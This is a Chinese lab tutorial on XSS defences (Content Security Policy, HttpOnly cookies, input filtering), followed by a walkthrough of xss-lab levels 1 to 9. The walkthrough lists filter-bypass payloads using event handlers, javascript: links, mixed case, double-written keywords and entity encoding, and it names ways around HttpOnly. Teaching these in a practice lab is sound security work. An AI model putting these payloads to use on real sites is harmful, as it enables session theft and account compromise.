当前位置: 首页 > news >正文

【第55课】XSS防御HttpOnlyCSP靶场工具等

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

# 知识点
1、XSS跨站-安全防御-CSP策略
2、XSS跨站-安全防御-HttpOnly
3、XSS跨站-安全防御-XSSFilter

常用标签:xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户
https://xz.aliyun.com/t/4067

1.XSS跨站-安全防御-CSP

CSP (Content Security Policy 内容安全策略)  各种语言都存在,只不过设置不同
内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。
该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单(当外部资源不在白名单内,禁止网站访问外部资源),
它的实现和执行全部由浏览器完成,开发者只需提供配置。
禁止加载外域代码,防止复杂的攻击逻辑。
禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。
禁止内联脚本执行(规则较严格,目前发现 GitHub 使用)。
禁止未授权的脚本执行(新特性,Google Map 移动版在使用)。
合理使用上报可以及时发现XSS,利于尽快修复问题。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

实验:

开启CSP时XSS的加载情况

在这里插入图片描述
在这里插入图片描述
XSS平台也不会接收到相关cookie信息

未开启CSP时XSS的加载情况(跟常规一样,直接获取cookie)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
绕过:有但鸡肋
https://xz.aliyun.com/t/12370
Web安全2.3:CSP安全策略、Cookie、Session、同源策略、HTML DOM树_同源策略与内容安全策略的区别-CSDN博客

2. XSS跨站-安全防御-HttpOnly

禁止页面的JavaScript访问带有HttpOnly属性的Cookie。
php和java都有该设置PHP.INI设置或代码引用,三种方式设置:
-session.cookie_httponly =1
-ini_set("session.cookie_httponly", 1);
-setcookie('', '', time() + 3600, '/xss', '', false, true);

实验:

开启HttpOnly时XSS窃取Cookie的加载情况

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

未开启HttpOnly时XSS窃取Cookie的加载情况

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
绕过:有但鸡肋
(1) CVE-2012-0053
(2) PHPINFO页面/
(3) Flash/Java
参考文章:XSS攻击之HttpOnly绕过-CSDN博客

思路:不获取Cookie采用方式(钓鱼,浏览器攻击框架等)

3. XSS跨站-安全防御-XSSFilter(过滤器的意思)

检查用户输入的数据中是否包含特殊字符, 如<、>、’、”,进行实体化等。

实验:手工分析&工具分析
Xss-Lab 标签及常见过滤绕过
环境下载:GitHub - Re13orn/xss-lab: 20 level xss lab by network!!!
常用标签:xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户
https://xz.aliyun.com/t/4067
工具下载项目:GitHub - s0md3v/XSStrike: Most advanced XSS scanner.
工具使用参考地址:xss测试工具xsstrike(基于python3)-CSDN博客

1、无任何过滤

<script>alert()</script>

在这里插入图片描述
在这里插入图片描述

2、实体化 输入框没有

">  <script>alert()</script>  <" 
  • 1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、全部实体化 利用标签事件 单引号闭合

' οnfοcus=javascript:alert() '

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、全部实体化 利用标签事件 双引号闭合

" οnfοcus=javascript:alert() "

在这里插入图片描述
在这里插入图片描述

5、事件关键字过滤 利用其他标签调用 双引号闭合

"> <a href=javascript:alert()>xxx</a> <"

在这里插入图片描述

在这里插入图片描述

6、利用大小写未正则匹配

"> <sCript>alert()</sCript> <"

在这里插入图片描述

7、利用双写绕过匹配

"> <a hrehreff=javasscriptcript:alert()>x</a> <"

在这里插入图片描述
在这里插入图片描述

8、利用Unicode编码

&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063&#x0072&#x0069&#x0070&#x0074&#x003a&#x0061&#x006c&#x0065&#x0072&#x0074&#x0028&#x0029

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这个编码浏览器地址是能够识别的,但是在前端代码里不一定能够识别
在这里插入图片描述
在这里插入图片描述

9、利用Unicode编码(内容检测)

&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063&#x0072&#x0069&#x0070&#x0074&#x003a&#x0061&#x006c&#x0065&#x0072&#x0074&#x0028&#x0029;('http://')

在这里插入图片描述
在这里插入图片描述

10-20

xss-labs靶场实战全通关详细过程(xss靶场详解)-CSDN博客

黑盒XSS手工分析:
1、页面中显示的数据找可控的(有些隐藏的)
2、利用可控地方发送JS代码去看执行加载情况
3、成功执行即XSS,不能成功就看语句输出的地方显示(过滤)
4、根据显示分析为什么不能执行(实体化,符号括起来,关键字被删除等)实体化基本绕过不了


http://www.mrgr.cn/news/13133.html

相关文章:

  • 十八、array 类
  • 更改etcd默认存储2G限制
  • Linux下单网卡配置多个路由ip方法
  • linux dma cache和主存数据不一致问题
  • chapter08-面向对象编程——(chapter08作业)——day10
  • 鹭鹰优化算法SBOA优化RBF神经网络的扩散速度实现多数入多输出数据预测,可以更改数据集(MATLAB代码)
  • hive客户端
  • 【Leetcode 2103 】 环和杆 —— 二维数组的应用
  • MATLAB 快速计算点到二维直线的距离并可视化(79)
  • C++ 文件操作
  • 国产游戏行业的技术突破与未来展望:挑战与机遇并存
  • 数据结构——二叉树经典OJ题
  • 搭建FTP服务器,通过浏览器访问FTP服务器,测试终端上传的音频文件。
  • #网络编程 笔记
  • 《第二十章 字符串处理 - 正则表达式》
  • 通过小程序进度条了解Linux下的多文件操作
  • 力扣网页端无法进入(问题已解决)
  • py 可视化图层
  • 国货之光|暴雨信创服务器亮相北京科博会
  • SpringBootFFmpeg实现M3U8切片转码播放(本地)